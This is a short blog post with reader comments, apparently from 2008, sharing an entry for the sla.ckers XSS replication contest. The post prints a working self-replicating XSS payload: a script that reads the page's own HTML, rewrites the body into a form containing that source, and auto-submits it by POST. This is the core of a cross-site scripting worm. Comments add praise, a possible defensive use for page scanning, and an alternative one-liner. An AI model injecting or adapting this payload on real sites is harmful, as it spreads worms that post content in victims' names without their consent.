I’ve been having a lot of fun with the sla.ckers XSS replication contest and I found a cool way to replicate source code of the html document which I haven’t seen anywhere before. Check it out:-
alert(document.body.parentNode.innerHTML)
This alerts the entire HTML document in Firefox (hopefully IE7 as well). Which is pretty cool
Here is my complete entry which submits the source of itself and posts the content:-
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content> '+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method= 'post')+'.php')</script>
The slice would have to be adjusted depending on the size of the document and the goal of the contest is to produce the smallest possible replication vector (with a couple of other rules).




Comments 5
This is interesting indeed! And could be used for many purposes like scanning the page content for malicious stuff getting rendered etc (combine this with onDomReady).
Very nice
Posted 07 Jan 2008 at 1:23 pm ¶veeery nice man
Posted 07 Jan 2008 at 2:18 pm ¶Works in IE7 finally managed to test it
Posted 07 Jan 2008 at 4:06 pm ¶Might be interested in this as well:
Posted 07 Jan 2008 at 6:36 pm ¶alert(document.documentElement.innerHTML);
@Nils
Cool thanks!
Posted 07 Jan 2008 at 6:42 pm ¶Post a Comment